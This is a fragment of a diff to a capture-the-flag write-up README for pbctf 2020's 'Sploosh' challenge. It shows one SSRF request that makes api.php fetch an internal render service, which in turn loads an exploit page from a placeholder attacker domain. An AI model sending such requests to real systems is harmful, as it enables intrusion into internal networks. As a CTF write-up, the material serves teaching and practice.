beerpwn/ctf/2020/pbctf/Sploosh/README.md

 GET /api.php?url=http://172.16.0.13:8050/render.html%3furl=http://<yourdomain-here>:8000/exploit.php HTTP/1.1
 ...
 ```
-basically the first request goes to the `/render.json` endpoint that is used inside the `api.php`, then a request for `/render.html` is generated along with the `url` parameter pointing to my domain where I hosted the page showed before is hosted.
+basically the first request goes to the `/render.json` endpoint that is used inside the `api.php`, then a request for `/render.html` is generated along with the `url` parameter pointing to my domain where I hosted the page showed before.
 You can look the exploit working during the CTF in the screenshots below.

 ![img desc](screen/SSRF.png)